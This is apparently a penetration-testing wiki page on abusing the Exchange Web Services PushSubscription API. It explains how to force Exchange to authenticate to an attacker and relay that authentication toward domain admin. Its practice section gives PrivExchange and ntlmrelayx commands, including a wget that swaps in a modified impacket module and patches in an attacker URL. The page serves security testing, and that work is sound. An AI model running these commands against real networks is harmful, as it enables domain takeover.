PushSubscription abuse

Theory

"PushSubscription" is an API on Exchange Web Services that allows to subscribe to push notifications. Attackers abuse it to make Exchange servers authenticate to a target of their choosing. As Exchange servers usually have high privileges in a domain (i.e. WriteDacl, see Abusing ACLs), the forced authentication can then be relayed and abused to obtain domain admin privileges (see NTLM Relay and Kerberos Unconstrained Delegations).

Practice

โ€‹PrivExchange (Python) is a tool able to log in on Exchange Web Services and call that API.
1
privexchange.py -d $DOMAIN -u '$DOMAIN_USER' -p '$PASSWORD' -ah $ATTACKER_IP $EXCHANGE_SERVER_TARGET
Copied!
In the situation where the tester doesn't have any credentials, it is still possible to relay an authentication to make the API call.
The modified httpattack.py can be used with ntlmrelayx.py to perform this attack. The attacker host needs to be modified in the script since it is hard-coded.
1
cd /PATH/TO/impacket/impacket/examples/ntlmrelayx/attacks/httpattack.py
2
mv httpattack.py httpattack.py.old
3
wget https://raw.githubusercontent.com/dirkjanm/PrivExchange/master/httpattack.py
4
sed -i 's/attacker_url = .*$/attacker_url = "$ATTACKER_URL"/' httpattack.py
5
cd /PATH/TO/impacket
6
pip3 install .
7
ntlmrelayx.py -t https://exchange.server.EWS/Exchange.asmx
Copied!
On February 12th 2019, Microsoft released updates for Exchange which resolved
    the coerced authentication issue
    the fact that Exchange servers had overkill permissions leading attacker to a full domain compromission.

References

Abusing Exchange: One API call away from Domain Admin
dirkjanm.io
Last modified 7mo ago
Copy link